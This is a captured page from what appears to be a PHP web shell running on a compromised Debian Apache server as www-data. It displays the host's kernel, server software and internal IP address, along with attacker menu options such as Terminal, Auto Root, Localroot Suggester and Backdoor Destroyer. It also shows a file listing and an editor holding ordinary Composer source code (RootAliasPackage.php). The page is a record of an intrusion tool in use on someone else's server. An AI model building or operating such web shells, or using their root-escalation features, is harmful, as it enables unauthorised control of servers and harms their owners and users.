Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Composer /
Package /
Delete
Unzip
Name
Size
Permission
Date
Action
Archiver
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Comparer
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Dumper
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Loader
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
Version
[ DIR ]
drwxr-xr-x
2026-07-12 06:24
AliasPackage.php
9.59
KB
-rw-r--r--
2023-03-21 10:50
BasePackage.php
7.45
KB
-rw-r--r--
2023-03-21 10:50
CompleteAliasPackage.php
3.84
KB
-rw-r--r--
2023-03-21 10:50
CompletePackage.php
4.76
KB
-rw-r--r--
2023-03-21 10:50
CompletePackageInterface.php
4.69
KB
-rw-r--r--
2023-03-21 10:50
Link.php
3.55
KB
-rw-r--r--
2023-03-21 10:50
Locker.php
19.11
KB
-rw-r--r--
2023-03-21 10:50
Package.php
16.63
KB
-rw-r--r--
2023-03-21 10:50
PackageInterface.php
11.45
KB
-rw-r--r--
2023-03-21 10:50
RootAliasPackage.php
4.83
KB
-rw-r--r--
2023-03-21 10:50
RootPackage.php
2.78
KB
-rw-r--r--
2023-03-21 10:50
RootPackageInterface.php
4.37
KB
-rw-r--r--
2023-03-21 10:50
Save
Rename
<?php declare(strict_types=1); /* * This file is part of Composer. * * (c) Nils Adermann <naderman@naderman.de> * Jordi Boggiano <j.boggiano@seld.be> * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Composer\Package; /** * @author Jordi Boggiano <j.boggiano@seld.be> */ class RootAliasPackage extends CompleteAliasPackage implements RootPackageInterface { /** @var RootPackage */ protected $aliasOf; /** * All descendants' constructors should call this parent constructor * * @param RootPackage $aliasOf The package this package is an alias of * @param string $version The version the alias must report * @param string $prettyVersion The alias's non-normalized version */ public function __construct(RootPackage $aliasOf, string $version, string $prettyVersion) { parent::__construct($aliasOf, $version, $prettyVersion); } /** * @return RootPackage */ public function getAliasOf() { return $this->aliasOf; } /** * @inheritDoc */ public function getAliases(): array { return $this->aliasOf->getAliases(); } /** * @inheritDoc */ public function getMinimumStability(): string { return $this->aliasOf->getMinimumStability(); } /** * @inheritDoc */ public function getStabilityFlags(): array { return $this->aliasOf->getStabilityFlags(); } /** * @inheritDoc */ public function getReferences(): array { return $this->aliasOf->getReferences(); } /** * @inheritDoc */ public function getPreferStable(): bool { return $this->aliasOf->getPreferStable(); } /** * @inheritDoc */ public function getConfig(): array { return $this->aliasOf->getConfig(); } /** * @inheritDoc */ public function setRequires(array $requires): void { $this->requires = $this->replaceSelfVersionDependencies($requires, Link::TYPE_REQUIRE); $this->aliasOf->setRequires($requires); } /** * @inheritDoc */ public function setDevRequires(array $devRequires): void { $this->devRequires = $this->replaceSelfVersionDependencies($devRequires, Link::TYPE_DEV_REQUIRE); $this->aliasOf->setDevRequires($devRequires); } /** * @inheritDoc */ public function setConflicts(array $conflicts): void { $this->conflicts = $this->replaceSelfVersionDependencies($conflicts, Link::TYPE_CONFLICT); $this->aliasOf->setConflicts($conflicts); } /** * @inheritDoc */ public function setProvides(array $provides): void { $this->provides = $this->replaceSelfVersionDependencies($provides, Link::TYPE_PROVIDE); $this->aliasOf->setProvides($provides); } /** * @inheritDoc */ public function setReplaces(array $replaces): void { $this->replaces = $this->replaceSelfVersionDependencies($replaces, Link::TYPE_REPLACE); $this->aliasOf->setReplaces($replaces); } /** * @inheritDoc */ public function setAutoload(array $autoload): void { $this->aliasOf->setAutoload($autoload); } /** * @inheritDoc */ public function setDevAutoload(array $devAutoload): void { $this->aliasOf->setDevAutoload($devAutoload); } /** * @inheritDoc */ public function setStabilityFlags(array $stabilityFlags): void { $this->aliasOf->setStabilityFlags($stabilityFlags); } /** * @inheritDoc */ public function setMinimumStability(string $minimumStability): void { $this->aliasOf->setMinimumStability($minimumStability); } /** * @inheritDoc */ public function setPreferStable(bool $preferStable): void { $this->aliasOf->setPreferStable($preferStable); } /** * @inheritDoc */ public function setConfig(array $config): void { $this->aliasOf->setConfig($config); } /** * @inheritDoc */ public function setReferences(array $references): void { $this->aliasOf->setReferences($references); } /** * @inheritDoc */ public function setAliases(array $aliases): void { $this->aliasOf->setAliases($aliases); } /** * @inheritDoc */ public function setSuggests(array $suggests): void { $this->aliasOf->setSuggests($suggests); } /** * @inheritDoc */ public function setExtra(array $extra): void { $this->aliasOf->setExtra($extra); } public function __clone() { parent::__clone(); $this->aliasOf = clone $this->aliasOf; } }